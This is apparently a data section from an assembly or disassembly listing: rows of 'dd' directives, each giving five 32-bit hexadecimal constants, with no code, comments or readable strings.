dd 0AA1BD5D5h, 0AC3FDCA5h, 4A299F87h, 65F5860Ch, 0F3B80EB4h
dd 6BA2B12Eh, 69835171h, 0F1C0BBE8h, 1E1CD738h, 0CF21719Ch
dd 4BEE6D76h, 5B4A01DFh, 0E82E607Ch, 8C86FE83h, 1CA7940Dh
dd 442358ABh, 751727E5h, 0B3A06895h, 7F259A13h, 0A7F96EF3h
dd 0AC9E52CDh, 0E7166398h, 1976CC35h, 267C7398h, 0D2C18C0Bh
dd 0C7A20579h, 0EEE5FC1Dh, 2B3ED12Fh, 4BAB9D39h, 47BC49A2h
dd 4824F4F3h, 0AB1F9879h, 2B7591F2h, 1C924AB6h, 0ECA3ED7Bh
dd 0E9983030h, 3D7B6150h, 6757422Dh, 84CB705Eh, 1BA4A3A5h
dd 0A9AE048Ah, 67CF523Eh, 61EA8016h, 560A6894h, 0E8741035h
dd 69E120ADh, 41762F15h, 7583C347h, 0FBA74FCCh, 8935594Fh
dd 0E56CB051h, 0FDE0B30Dh, 7C9E0D64h, 0A05375BEh, 0A5062DB1h
dd 29060D9h, 18BEE525h, 7E6757EDh, 4A64CD05h, 18BF3D1Ah
dd 501DC680h, 1EC27A7Fh, 0BFAE4E4Dh, 79242844h, 0B089189Bh
dd 448C7390h, 0D1A75BA8h, 0D56CF078h, 0F5BBF278h, 353B6BAFh
dd 0CA9467E0h, 0B91241B9h
dd 0AB7023E3h, 0CB9A50F0h, 0A0BA0A64h, 21C0BF69h, 269EE5E1h
dd 3B394A1Eh, 66294C74h, 14A28B23h, 0D92C5081h, 773EAF03h
dd 0E014010h, 314CD408h, 26F84382h, 0CB5D50B7h, 13D112D0h
dd 2AE7D5AFh, 61211672h, 7225A9D2h, 6FE718F0h, 0E2BD13ACh
dd 21801D3Bh, 8328B965h, 0EB2BA95Bh, 0DB86D2D0h, 0FC1EB119h
dd 253FCABh, 0CB2E3C47h, 9C79EB1Bh, 76C5B09Dh, 91AACC27h
dd 0C626F05Eh, 0D4290AC4h, 78DE0B9Ch, 719D44D3h, 15107CFh
dd 98F0C1A4h, 0EB284BD7h, 0EEAB6260h, 119CB0B6h, 4BDAAD76h
dd 83CF48E1h, 0F9D506C6h, 0DD22C897h, 3F4E6793h, 0CCD21E68h
dd 0F32146D7h, 0E67481B6h, 0B7F6BC0Bh, 8117BFFBh, 7C8DF870h
dd 0B0525F30h, 0A855A1E4h, 69527559h, 8A0D67DCh, 0B6898EBAh
dd 0A36588F7h, 98ACB99Dh, 3E99B418h, 0A3FB8288h, 9F792A8Dh
dd 6F31C3D8h, 0FC9E449Bh, 6FCB3712h, 6B86ECF2h, 0B9754AE0h
dd 1C0BB099h, 65FF2CC5h, 0E18D1F87h, 4DC5E0F2h, 8FF14257h
dd 0ED596656h, 0E275ABCFh, 198018F1h, 0B5ABB031h, 8558D5D4h
dd 0F7405C8Ah, 0A87E6A62h, 8A10E186h, 2B469E3Dh, 0DB8D8A81h
dd 2B0BE67h, 7268D61Eh, 4F774695h, 458BA883h, 2901AAF5h
dd 7727A046h, 0B8058B8Fh, 2415ADFCh, 0E1BD783Eh, 0DD4B5814h
dd 1901C76Ah, 0E745AB5Bh, 0D3445852h, 1DCF6C2Eh, 0D0FCF309h
dd 0AE76265h, 226D6D2Eh, 0A5A0D26Eh, 0DE0D8C66h, 0F3705F7Dh
dd 36B847C0h, 64C498E9h, 0B1E110EEh, 5E844371h, 84A35320h
dd 298524BFh, 9ED6B320h, 622E438Ah, 5A2539EBh, 6EE7E615h
dd 0D4094716h, 626646A1h, 0EC1259BEh, 48B1F030h, 0FECD2852h
dd 0B48DE245h, 0B3687077h, 0B8F79777h, 0CCD3AEC2h, 6BFD615Dh
dd 0B998D5C8h, 566A5EE7h, 22F85DBCh, 0E9F4FA1Fh, 5D4EDD5Fh
dd 0DC3A53B9h, 7AB5CE8Dh, 0C38EAE9Fh, 8F2CA32Dh, 0CF205E96h
dd 45A9D6Fh, 5A00BF1Bh, 0E94A8705h, 6D99C696h, 4F5654E3h
dd 9ACAD6DEh, 60530B7Bh, 0F079E168h, 6E988EC6h, 7720B125h
dd 2898C718h, 96E8B6B2h, 231826Ah, 0D46DAE3Dh, 2FFA37AEh
dd 635AA13Bh, 0BBE86E17h, 51DCA568h, 7CCA6ED2h, 0FAF89AC1h
dd 0FBDB9C15h, 63D41A17h, 1F6EEC14h, 3A160917h, 0FAC40F2Ah
dd 0F479386Ah, 0F3C5254Bh, 22317166h, 0B8111626h, 8DC429D6h
dd 756E3FD4h, 0A3772666h, 0C7E1A897h, 0CAF7E39Eh, 0A1480E64h
dd 25017903h, 0D0E9267Dh, 8206EDC1h, 158C7C9h, 49E3FBB2h
dd 82FA4EB9h, 5FA6D189h, 0F05BF7D4h, 0F7DF0EFBh, 66787EDAh
dd 5ECB07EAh, 9CBB38B7h, 79114C3h, 5DBD60B7h, 0CEAA0707h
dd 95EE8ED1h, 0CE0F4D73h, 0E89F8F18h, 41BD9EB9h, 0B80C28CDh
dd 0BA3A0E26h, 74DB1601h, 3EEB274Dh, 0C0B0EB30h, 0E4AA956Bh
dd 0BAF10A65h, 67A15E1Ch, 0BF74144Fh, 0EA3665C3h, 0B61DA861h
dd 83AF8CF7h, 570688ACh, 0E5E60F21h, 7DA61C1Fh, 9DA276CCh
dd 96353C2Ah, 867A9D0Ch, 0C484E8D9h, 0F1233311h, 0FAF44E42h
dd 0C988E59Eh, 28DBA6B5h, 0D6E21AD4h, 0DDBB892Dh, 6915FB23h
dd 0B18FD9BCh, 87555A91h, 0AA9FA569h, 9613960Ah, 40B3178Ah
dd 6AE53A32h, 2061E1Ch, 0B8A83179h, 36E18FE3h, 41ADFE9h
dd 4B462AB5h, 0B19A6A97h, 40D5C4B2h, 376A7527h, 0A140548Fh
dd 28186242h, 51AC33F0h, 0A3396975h, 7E715AC6h, 42B9E89Fh
dd 4D51B5BEh, 5125F075h, 0FEE14AB6h, 6F162E89h, 17D37D5Dh
dd 0C2B42EABh, 827DF5FBh, 0F5F14CFDh, 2BB1FEA5h, 0D57637D2h
dd 43F60CD1h, 0CC804A96h, 0A1E6B139h, 0B75A99B3h, 0A56FED6Ah
dd 53B2E10Ch, 75B78FA2h, 6221E02Bh, 8EF229ACh, 558CA367h
dd 8F88DA3Dh, 9F107917h, 79259607h, 0D90EC342h, 0D3FFFFCh
dd 7095D602h, 52279B1Bh, 90D7E766h, 0B15CF759h, 0C579E8E4h
dd 0C70BECCCh, 0B351E573h, 0E5B70713h, 0DE8919EBh, 6531635h
dd 692467D2h, 4AE9D851h, 0E5BA183Dh, 0D2B8230Bh, 0BA1B268Dh
dd 0D8F4607Dh, 0D2E54F23h, 63FA4CAAh, 23E55C23h, 0AB53DB45h
dd 6CD23993h, 57169F7Bh, 0AA75BBE8h, 1404E059h, 1B953167h
dd 923A2EBAh, 0E8ED95CCh, 9D48AAD7h, 0DE5EA75Eh, 2470F3DFh
dd 0DE9BBE4Dh, 387F504Fh, 85F21124h, 0AF2B9FDFh, 6978EFCAh
dd 19C0A96Bh, 62F06189h, 0E61A94C8h, 1156BA6h, 0CE19A5AAh
dd 8806258Bh, 0D0D54883h, 687AEA8Dh, 738297FDh, 87E3F505h
dd 0CA8D33E5h, 0E26326CBh, 32F58C3h, 28850FB2h, 41309D6Dh
dd 176F2BE6h, 0F1F9CEC2h, 0B747CBCDh, 805447D5h, 0B0BE3CCAh
dd 1C76DCF0h, 50A8092Eh, 0AF2A57E8h, 556B1DDh, 9452191Eh
dd 0EDD4FE6Fh, 0BC1AD17Ch, 0F82CA98Bh, 561647A1h, 0E2AFAAFAh
dd 973A8FEEh, 15A92856h, 30683F09h, 0EF9AD425h, 15A2D6F7h
dd 550732B6h, 0A8BE5014h, 5014ECA3h, 0C1B06326h, 0E764B8Eh
dd 0DE2D2FD5h, 0F289FE70h, 813196E1h, 0BF6597D9h, 0EF63BC2Fh
dd 0A92C0E3Eh, 0DFB764C3h, 0AE5A74B5h, 8DD5FA7Ah, 5F87AB56h
dd 6A31DAD9h, 243BE23Ah, 98FACB01h, 1F7D9825h, 0FE967218h
dd 0E17AD68Dh, 29256655h, 8D0DBB0Ch, 0AAE5D82Bh, 0EEB41D72h
dd 0A9E74F1Ch, 0BEB5A053h, 0E8A0250Dh, 0A545976h, 0BF35AA85h
dd 58E5DCCEh, 8440B41h, 0B8AC2DB0h, 0BF151B5Dh, 5D84AE0h
dd 0FEA6D8A8h, 0EC7C0ED5h, 82BFCB83h, 8B70950Dh, 0DEED2229h
dd 738E02A7h, 9E29106Bh, 802EC903h, 0B71A5E90h, 0B706EC78h
dd 73A0CBD7h, 0CE27C737h, 75FA8948h, 0DA2A0284h, 0FB8B4D3Fh
dd 85893E75h, 0DE1A678h, 7E34DAE5h, 28E08B56h, 264002BAh
dd 763DBF49h, 40A05D14h, 0A028A1BBh, 0C29DC366h, 13699198h
dd 97528450h, 87ED5DB7h, 616D8BE0h, 0A678817Ah, 0B83E5024h
dd 8977913Bh, 0B84BFACCh, 71F24E4h, 5687D2Eh, 1FE83440h
dd 93BBFF68h, 0A3CF177Eh, 0E3E1468Ah, 999BCE2Bh, 85555C2h
dd 0A79DB5B1h, 9B1198D8h, 0FCC57702h, 0D5C5AE03h, 32EEEE57h
dd 0C807F777h, 2D65364Ah, 99E83409h, 0FE16D260h, 3750FAE5h
dd 28BE4BC4h, 80915FC1h, 7F4F6EB5h, 0EFE3D7C8h, 82565A3Dh
dd 7E947A12h, 13E9EBFFh, 0B046AF87h, 9A88A5E8h, 7C02F8B9h
dd 0C73812D6h, 7C54890Dh, 0CAA67E3Ah, 0EA8B6B9Ah, 6F70E775h
dd 0B76A9EF7h, 2FB0FC19h, 26EAAB0Fh, 63A95F68h, 0BF83734Eh
dd 0CAEA6500h, 0D0C43553h, 0AE2C426Ah, 0DEEB29FBh, 71CB48BFh
dd 773257B1h, 60A6F9F9h, 4FA35E00h, 0EC2DCA68h, 0F9C1D3Fh
dd 89D56729h, 0F6212C32h, 0D81458AAh, 73E4FDF1h, 65160029h
dd 0DF85267Dh, 6E0214FFh, 72E54EA9h, 7319CD53h, 399FDFB0h
dd 0F1CE93F7h, 0C51162D5h, 4E962538h, 0B450C451h, 492529F6h
dd 2298760Fh, 393F9744h, 2E0BD62Ch, 13504ADEh, 7CC144B3h
dd 0E8AB59BEh, 2FB22F8Fh, 81CEF89Ah, 510ED175h, 0DF8275EEh
dd 0F2D5B525h, 96E60227h, 0F69F1CC6h, 0DA305543h, 7D11D9E1h
dd 0A1D6B91Ch, 942E45DBh, 4DD88A72h, 0A3D92475h, 2473D2FFh
dd 0DB829E18h, 0EA853050h, 0FA528686h, 7666A732h, 0C07736DBh
dd 0D44A750Fh, 84E2022h, 0FF835D0Dh, 76513482h, 22E802DDh
dd 0B44161FBh, 0BBDA995Fh, 8C83E33Bh, 0EA7244Eh, 97F598C7h
dd 0B4CF4EF3h, 15C25776h, 0FD28897Fh, 0CFE911B0h, 0C1879E4Eh
dd 1D276820h, 0CD69AED3h, 6C01AE46h, 712E9A8Bh, 19555CCFh
dd 4A1CB969h, 0A99FFCC7h, 4189E3A8h, 6CE65BEFh, 112550ABh
dd 0BB6F415Bh, 886A8B95h, 1F8959A5h, 0CCCAB436h, 55CFA9Eh
dd 444FA23Ch, 9A99F74Bh
dd 0A3916AA8h, 0A25899CAh, 1E3CC280h, 0AE70AAFCh, 9DA25226h
dd 5C61DD3Fh, 995A6794h, 54ED4AC7h, 0F0255089h, 3B4B1C32h
dd 0A8959853h, 448D51C9h, 5363A46Ah, 1CD2F427h, 859AEA7Dh
dd 246D0393h, 0D82F726Dh, 23162498h, 2C4B968Ch, 0EC6E8ABEh
dd 0EB19E55Dh, 9D8717A6h, 3A7E0A24h, 96176090h, 480D1310h
dd 30DDC855h, 99466239h, 8CC783DAh, 333C0BDFh, 3DD21715h
dd 0A52A59D0h, 0D375747Ch, 0DCA08AB0h, 44F76C63h, 7F172933h
dd 4A85EAA4h, 9C945337h, 96FA391h, 29F5D46Bh, 0CB0371E7h
dd 69ACCC25h, 0ADC9C98Dh, 0E0331C60h, 0A9D86BABh, 1454028Dh
dd 0BD605633h, 5D6D6F56h, 735006B1h, 3E5612C8h, 55EAB633h
dd 0FB044BB8h, 6F5B6B65h, 513F2259h, 4C39B271h, 5AB749D4h
dd 0A5696238h, 576545A1h, 0D005E7E7h, 0AAEF8473h, 928A0A2Eh
dd 0C85D97E0h, 9D5D1A00h, 83F32605h, 0F8D395DAh, 0F57CC0F0h
dd 0DE65AC86h, 42C3546Eh, 81AED527h, 197E47FDh, 586EC8B7h
dd 99BB300Ah, 0DE066E30h, 0BDCA867Fh, 91331D0Dh, 63802CB0h
dd 0BFFFAC63h, 6AF5912Bh, 49485D48h, 2981035Ch, 3013DF21h
dd 3553D6B0h, 4BED7A22h, 5ACD2A88h, 0EB85171Ah, 61F0AA20h
dd 865228A2h, 505D5E51h, 35D26B19h, 56F0AFDDh, 244E22FBh
dd 615573DDh, 317F8ABAh, 8CE68D10h, 0B95F7CF3h, 3D682CEBh
dd 1F23B87h, 0DB808848h, 2F92D4EBh, 84711D04h, 0ADD7EEDFh
dd 0FB75131h, 3232587Eh, 9F63D155h, 4233B168h, 0E4D45EF9h
dd 4C7D2194h, 93FDC8A2h, 0EF0CCD40h, 0E98A9607h, 5305E57Ch
dd 5EF1E404h, 0FA9EA7F3h, 485D307Ah, 0EAC2215Dh, 64FB12B8h
dd 0F8CA3B3Bh, 7530F4A1h, 0C1E05431h, 1E379AFFh, 0A1345DCh
dd 29575A5Dh, 9BA5EC5Eh, 92D422ADh, 0A09DA5D1h, 28ECAB2Eh
dd 3E75A7E6h, 9942D14Fh, 645E550Ah, 0DA85700Eh, 0CB8B6C0Fh
dd 0D28E9DE5h, 0AC6899F8h, 0FF91F68Bh, 0E8E25FE3h, 7C5735E9h
dd 32127E8Ch, 6D262ABEh, 25AA3738h, 340AF554h, 0FDD80A9Ch
dd 8E60F581h, 2DDCF711h, 33084ADEh, 388836D5h, 0DE0DC76Fh
dd 9D04793Ch, 0EF03DAA1h, 0D06C2C7Dh, 0C490C2D9h, 0DFB53367h
dd 27461E7Dh, 23CA487Ah, 78B259A9h, 5C1E1A95h, 7568EA32h
dd 0B8FFD5BAh, 0C84E80E4h, 1AFB4780h, 0EC8B07F1h, 52D44BD7h
dd 35774563h, 205CFBC7h, 0E55456C4h, 9CBCAB34h, 0D65366BEh
dd 830CBEC9h, 2B5FCF3Bh, 4E496643h, 6978A268h, 95866A4Bh
dd 0E19B01AEh, 478AB4B5h, 6B7A160Bh, 81B7DAB3h, 0A0D2E3A0h
dd 0F5DEFBA8h, 768ECE33h, 0C96740EAh, 4335957Eh, 64A95D01h
dd 0E1331CF9h, 6034ABB5h, 562AE3A3h, 1C2CBF73h, 7D4CCDB7h
dd 53BB4AF8h, 3A11F820h, 0B3A998DAh, 7F01250Dh, 2F94252Bh
dd 6E60CA8Eh, 82BDA25Ah, 0D89B729Bh, 0B77C58D6h, 0D399A4FCh
dd 0F2E36344h, 54FE1CE0h, 1A2507F1h, 0D3A9B3BBh, 884E2FD8h
dd 74E9E18Fh, 0EB47B7D1h, 0D0554D17h, 0FE763114h, 4C08A9E1h
dd 2A020812h, 0E620A701h, 28AE5014h, 40FCF742h, 5D209046h
dd 53EA6045h, 26B849C4h, 1C7C0254h, 0C09EEE13h, 9823463Ch
dd 2604E709h, 28BF29D0h, 617A77A0h, 8F405818h, 0A43E10C0h
dd 460453E5h, 27F76205h, 9920D4A0h, 0E5060A02h, 40585223h
dd 33A314F0h, 6F316090h, 268CB60h, 9E3606A3h, 82AD4634h
dd 30202A2h, 5660A51h, 2CF10960h, 0AA208E2h, 2EC7F2CEh
dd 73B8B949h, 0F22A146Dh, 55AD2507h, 0F567B5DAh, 381B1E18h
dd 0DFB25CAAh, 90820F85h, 44D5F8Dh, 68E8FD0Ch, 1CEC8B91h
dd 71A2CF68h, 78240F86h, 81FEA8DCh, 0DD65A301h, 81E8D5E7h
dd 0B56A0B4Dh, 66D370B2h, 1E5B7BAAh, 807CDC4h, 0B5AFF0C0h
dd 8E587B2Bh, 0D537A1CEh, 163B3C4Bh, 44E0A350h, 0CE9B1A22h
dd 0F1BE424Bh, 0D199E07Ch, 647F2556h, 2ABEC5F0h, 0B62F939Eh
dd 7867D61Fh, 0E6E9FADDh, 9CFBE129h, 3A8C5A0Ah, 0D6794467h
dd 0A67AE062h, 9210564h, 0AD1E2A9Ch, 0A05AB8D6h, 0AAA40C82h
dd 0E7B31CECh, 184A629Fh, 17DF32CBh, 0A36877FBh, 28BAFE2h
dd 8AAAD355h, 7B90FD35h, 6DEE7ADBh, 0FD1816EBh, 0E4949CC2h
dd 0AA14CEA8h, 0BF475F83h, 5F07D68Dh, 0F2CF9BB1h, 65680E66h
dd 2346A875h, 0F709A526h, 4E71B33Eh, 0C30EFEE2h, 0F1F3D06h
dd 3101CFC7h, 561F0E3Dh, 71D5DACDh, 0B1BA858Fh, 8BB1913h
dd 0A373E141h, 0FD8594B5h, 83BCA1Ah, 0C85F370Fh, 2994AAE9h
dd 0FEFC420Ah, 3A7799F1h, 5B555EEFh, 6D0FD60Dh, 6BDCADAAh
dd 5A21EC0Ah, 0D3DBA54Ah, 0CA0AC446h, 7AE32D10h, 62C0E3BAh
dd 0EFBA887Bh, 193AF68h, 0BE86B634h, 75A3DCE6h, 0C953B9B7h
dd 2A996AC7h, 0C19581A2h, 0EEBB5442h, 1C9FB609h, 861F28BBh
dd 66D5DFF7h, 1770869Fh, 5CFEF341h, 40471B0h, 6BF40F86h
dd 1242768h, 0F9B8D0BFh, 0F7FB3F05h, 398DAED9h, 5FCE1FC8h
dd 2F6EF3EDh, 5B0266EBh, 0E1F82615h, 0B422E8EDh, 2A650A8Dh
dd 90B4303Fh, 0DBAA22C7h, 8A5F6FB8h, 3744DBA9h, 3B7F2390h
dd 134FAAA5h, 79154184h, 0BCA00C6h, 0A9AFF8FDh, 0FC8DF72h
dd 237CEA5Bh, 80C0E50Fh, 66F7F1ABh, 7FC61266h, 0FA8F0C41h
dd 0CE094B9Bh, 0F06F8B6Fh, 0D3AD53FBh, 3B1676FEh, 0EDF23F60h
dd 8EEC8F9Eh, 0C87B3D20h, 0DA16C51Fh, 0FAC0BA0Fh, 5FAAFA76h
dd 8A0146E3h, 0A46FE0A8h, 9C502658h, 4FEFCF68h, 0FC61446h
dd 0EE76BED7h, 383E515Fh, 6ABEE1EBh, 2B03831Fh, 0F974432Bh
dd 8AA3C740h, 92EF1E2Fh, 6CF6D860h, 0DC756F2Dh, 0B32DBF1Fh
dd 328C31C5h, 9506C2DFh, 0AE373612h, 8BA250D5h, 51D7A58Eh
dd 73ADF77Bh, 7668C62Ah, 0DA9A0DD9h, 0E9ED0A69h, 59F9287h
dd 0FDAFC996h, 5C7D38ECh, 75E0A0B3h, 6BAC4266h, 9F6830BFh
dd 0C2C3FB17h, 0DD858C34h, 2E5126EEh, 4DDF7733h, 0A0648C4Ch
dd 4A319D0Fh, 1AACF114h, 0FB44F36Ch, 768AE895h, 0D8FA86B7h
dd 0C5C8BB45h, 0A28A4E07h, 411DDF6Ch, 5ABABDDFh, 0E94C9A52h
dd 7D7F9D06h, 76EB4B01h, 7B03B545h, 0DA08CFCDh, 523AC382h
dd 0D62CC515h, 0F93E3140h, 0C6B670D2h, 0A4AD7303h, 347F5FA7h
dd 0B2A81588h, 5A5FEC08h, 0EF3B42F8h, 0E66E3120h, 0BC3EC9A9h
dd 3EA8A26Ah, 6FC344B8h, 10881968h, 0D1A90E0Bh, 0BAEA2446h
dd 9F9EA749h, 0AB1E3F9Eh, 33B89A30h, 2E2BDAFBh, 0B17E0176h
dd 13A02136h, 689EAA2Ch, 0D7BE2C58h, 5D0FDCD4h, 0ED0F3148h
dd 2AA2A53Bh, 7F4F8D62h, 0F040D18Fh, 7E9974CBh, 3060566Dh
dd 0DA5BFE71h, 0D255C9BBh, 16070534h, 0DF4D2308h, 7317F560h
dd 0A4BBB8A0h, 1F829585h, 6EFA8886h, 0A6372414h, 0A472C054h
dd 4D77C653h, 6E93DEF1h, 0B47F183Ah, 1CA54F52h, 0CAC32D3Fh
dd 0B5406B03h, 0AC80DEB9h, 0FDADE88Fh, 87BE42A5h, 7E443280h
dd 3583BF13h, 9A66B33Ah, 731D8CFEh, 0CB87480Bh, 0F242A50Bh
dd 19DC815Eh, 4B0170AEh, 0D4704DE6h, 0F11D55C7h, 0F2EF0C0h
dd 1D41ABE7h, 0F1715AF5h, 9F8DCDC3h, 2AC2ED8Ah, 85291FF8h
dd 0B46A8DEEh, 0C4656947h, 125F6497h, 8C722A49h, 5CDDCC7Bh
dd 0D659AC14h, 0AC0FE8A1h, 7F5AA0F9h, 77AE47BEh, 0D4FBE9CDh
dd 9B94AFE5h, 0E1F853D7h, 6CF93F1Dh, 98DEBEDFh, 4A86EDBh
dd 0A39225C7h, 0CD28B7Dh, 11A712BDh, 273A98C8h, 6DC0F439h
dd 7C6B5383h, 0F39FDF4h, 3AF9AC63h, 785072EAh, 0B563C4D3h
dd 0E1346371h, 0ABD5912Fh, 7575FB49h, 9718B91Ch, 4B120993h
dd 3110CC6Dh, 0AF5FDF2h
dd 0D4C527EDh, 953CE553h, 0D28D1F71h, 7DA1CF47h, 0EF7AE565h
dd 0C39853A8h, 0D8BE5C7Ah, 5C9EB37Dh, 0DE766B52h, 4D938826h
dd 0F29BE0F5h, 7FBA43F0h, 0D652A8B3h, 0FBEFE87h, 96453762h
dd 0F269DC2Eh, 0FD70A219h, 9D327694h, 473C0Bh, 44D362A1h
dd 97FB3B8Ah, 952A5383h, 44BEE655h, 7E0BAD30h, 554C3198h
dd 48FCEFFAh, 7C2AAA5Bh, 6252E166h, 842AD559h, 4DF0359Fh
dd 81E1E713h, 2ED9CDCCh, 0FD0CA9B8h, 71C36976h, 86653E07h
dd 0F362B429h, 516AE2E1h, 0E92A1DCCh, 6925EAC5h, 0AF2E9354h
dd 0D12EF831h, 5A943AA1h, 84FA071Ch, 18DFFE8Ch, 8AAE236Bh
dd 0A3A8F526h, 64579BC9h, 0ECD678E8h, 20F9E696h, 0F0FC79BAh
dd 0CE67B7F2h, 7F262589h, 0FF49E07Eh, 0D652ADDBh, 0D2BE1BDDh
dd 56583398h, 1CBE0442h, 8989B1CCh, 88AA9CB4h, 6C389EE2h
dd 0EF80F54Ah, 77F4783Bh, 71DB216Eh, 0D2B16CFEh, 0CD484997h
dd 3AEB0684h, 0AE66EBEh, 0E241263Eh, 385C9583h, 59A81B85h
dd 0C4C97B21h, 0CC032118h, 0A1F4079h, 0C3F2DDF7h, 0E242B455h
dd 49ACBBD3h, 4E3657FAh, 320A7BC5h, 0B128C4F4h, 4BB2AC5Eh
dd 46DCEC0Dh, 0D8E0F94Dh, 3735FE1Bh, 8A57523Bh, 0A2FC7210h
dd 132B375Eh, 1AEF2B6Dh, 0BB11A912h, 42C42CE7h, 9AD70590h
dd 2D5FD09Fh, 0C826F44Ch, 7CE55F91h, 85CD07CFh, 0DE5AE0E2h
dd 0FA154420h, 0E04A2C0Fh, 0DD9EB3DDh, 0C21F716Fh, 0F9BD3A60h
dd 2D40F15Ah, 0E98DAA2Eh, 3BBE4307h, 0EFF37FA4h, 0C6195846h
dd 93C4F688h, 71B566D6h, 0E2B5D12Bh, 49A1BCE6h, 4C711645h
dd 0F916D41Dh, 0F267FC51h, 5DE630F7h, 0CA9CD211h, 2BC00B03h
dd 0F5781291h, 74DA27AFh, 0C28EFBAAh, 35A36FCCh, 5809BE9Bh
dd 65761B14h, 474AB094h, 0CA3EF36Bh, 0FAEB2D37h, 0A5FEA6E9h
dd 7ABE6F0h, 0D7F9765Ah, 6900645Fh, 8ECBB7C2h, 4B5D612Ah
dd 32A73EA1h, 94A89AABh, 0FD6BE5C5h, 5B236EFEh, 80CD4742h
dd 5AA7C53Fh, 0C0C381F0h, 0DA3307F0h, 0AC070BA3h, 31F7E3Ah
dd 1D6D1707h, 0A5F67DCCh, 1EDC19DAh, 49218FAh, 0EE9AAD7h
dd 0FF1C85C6h, 0AE9E5E44h, 8E9DDD80h, 4172A895h, 0F110FC6h
dd 451F40A8h, 3D76EFB9h, 269DC880h, 0BE01BA6Bh, 5E724A0Bh
dd 0BF7EB4E1h, 101446E2h, 324AF72Eh, 0F396B5Ch, 0B8F8F942h
dd 0AC6F203Dh, 3FBF9B78h, 65CA7551h, 18D14826h, 113DA645h
dd 0E4D2607Eh, 5F530F1Bh, 81A8E74Eh, 6903CB81h, 296D756Ah
dd 3AAB553Bh, 0DF04D8F7h, 555E2AA0h, 905AA7F6h, 0B0AB6CA7h
dd 1CD3DD66h, 561856B0h, 42E5E92Ah, 4580DC34h, 4280C1E3h
dd 8E2993DFh, 6A35E890h, 0CBE92667h, 0CADD4BA2h, 3F55A09Fh
dd 0D954E74Ah, 8D1D5D93h, 8D0246Eh, 3EC8DE51h, 0D6A417CFh
dd 64BCE6C1h, 0CC2F480Ah, 8BD6C7AEh, 1F32E09Ah, 7111D6CCh
dd 4C3D1EFBh, 7881AC09h, 2E4146BFh, 6AB9F46Bh, 0B0929FF8h
dd 6D0C3B3Ah, 0F29112CAh, 0FB16FAD5h, 1F382F78h, 8D65EABCh
dd 0A15B3E1Ah, 0B3BE72D4h, 0F21B6BE6h, 0C8F98046h, 47FDD0E8h
dd 0D101E083h, 0FCE0F07Ch, 927824AFh, 40A8E0Bh, 0FB181F6Fh
dd 381D3807h, 930D96DEh, 0EEA16CEBh, 0C814994h, 0C945F3BAh
dd 0A07F4D43h, 34E15391h, 0DBD1B4B8h, 304A4CC4h, 78A00950h
dd 0B47BB392h, 0A2FDEA31h, 25476768h, 0C6D4AD39h, 9A6A4391h
dd 8BDDC115h, 0C4B00226h, 29DDC1E7h, 0C2D9BFB0h, 9870E942h
dd 4A776046h, 767E9FE4h, 43F863B4h, 2612721Dh, 7FDD084Dh
dd 879CDBD9h, 46DDFE47h, 624A03ADh, 8B8EBA57h, 0E4ADD108h
dd 0A094D9BBh, 0A73A5668h, 0D0D35B44h, 8837AD24h, 1C3C7E7Dh
dd 540FE2BCh, 1DD92ADEh, 6E754E4h, 44D9948Ch, 0FA38B501h
dd 69F7FDD4h, 2908FFA4h, 0A87E9313h, 1807D319h, 37C03F09h
dd 2A7A4C5Dh, 3B1CDA04h, 2796B8Ah, 0C8F3A2Dh, 0B90A2A1Fh
dd 0C3E3E33h, 70CE1D46h, 76EB2C7Dh, 0E8F2FF69h, 3F162610h
dd 0C797181Eh, 3DF4A9BDh, 44D0F2F1h, 0FC461AC8h, 8626ADB0h
dd 0B8370B22h, 0BD462C06h, 50AF010Ah, 41530BFAh, 88941F6Eh
dd 94752120h, 7DFA1F98h, 9C1F3B68h, 99FA3BBBh, 88DE6F29h
dd 79DD9E55h, 25B4303Eh, 362B76A3h, 0D81E1BD3h, 4DA16027h
dd 3FB80696h, 13EB9ADAh, 0FA95A722h, 81353CC5h, 9C91D9EEh
dd 5AFAC9F9h, 89D708B7h, 81E4A8BAh, 902E1251h, 9F335966h
dd 0AF76BE1Fh, 0E36A5AF6h, 0CD0773AFh, 2E7E3EDDh, 457AB56Eh
dd 7578A855h, 9060DA93h, 2293C98h, 2234D1A6h, 0AE5F3B8h
dd 0A2DBC1C3h, 8A0F6606h, 61D53396h, 0B59F47E2h, 0BFBE1082h
dd 31FC5584h, 373899F3h, 35F34A79h, 44DB7EBDh, 1478C95Bh
dd 556E5D7Ch, 2D4E1F54h, 0A7D60BE7h, 0E99EB9BEh, 3E1E128Ah
dd 0EA1AE38Ah, 8DF2D725h, 9D1B6333h, 9AA31A0Dh, 5DAC29C4h
dd 388081F9h, 0DEC85318h, 87344E66h, 4F4565A3h, 543D742Ah
dd 5B0B9553h, 99C0BE36h, 9EDE30A6h, 3A62F4BDh, 4C060E1Ch
dd 0B18472BCh, 0D52ED1C7h, 9EFB57FAh, 3FB5BAEh, 53AF4176h
dd 0E1C66B22h, 2CA951CAh, 9A776494h, 0C0FB7F9Fh, 0C0FB1F85h
dd 3897A071h, 0DCD961A1h, 0C1EFFA42h, 0B9B08F17h, 7665234Fh
dd 85B98EB7h, 0B3B13A28h, 23F7E9C4h, 0A3A16608h, 0CE2B7ABDh
dd 0DAD2A8D6h, 2AEDE063h, 9572F0F4h, 4B907562h, 5A2DB45Dh
dd 47AB0A5Dh, 4AE70B52h, 0E3AB4BC0h, 50622A87h, 0BC740AB9h
dd 2DF5E0EAh, 0A4F45F50h, 0C0FF069Ch, 39BDAC97h, 33762C58h
dd 2A36911Ch, 838DB451h, 1F0B3C6Bh, 0BB60015Fh, 23209D22h
dd 0E78E79B6h, 0E7AB125Fh, 6F07A38Bh, 842FDF36h, 0AB8B49D0h
dd 47024F26h, 7E222CFBh, 0ED64694Ch, 9F5E6DFEh, 4F5D2379h
dd 12941569h, 829CBCEDh, 0B840AD39h, 9570C4D0h, 0BFBF5F67h
dd 59C67C10h, 44A10389h, 45F2E982h, 4EE6C529h, 0CCDBB4FBh
dd 3E4B5275h, 0B42AEFF9h, 80891EA2h, 21C8BF1Bh, 0E6FA5E3Ch
dd 21F34628h, 0D69E7124h, 7067C6E6h, 2F96B8A7h, 0E93F471Bh
dd 0AC414AFh, 9A956AEBh, 8EB8F911h, 0B7E1A255h, 0F48277C2h
dd 3ED5FC50h, 0E4C7491h, 6DEB07DCh, 0B6B58D49h, 0A6C8C402h
dd 3C5F5196h, 92E62D1Eh, 70EE68DBh, 0CE75E2B9h, 0E3DAA17Dh
dd 0A9706340h, 0F32D912Bh, 80F7C31h, 4C5B5C19h, 3CE99391h
dd 3913B9BFh, 0E3CE5F43h, 185FF862h, 0BBCA4D5Fh, 0CCE0C813h
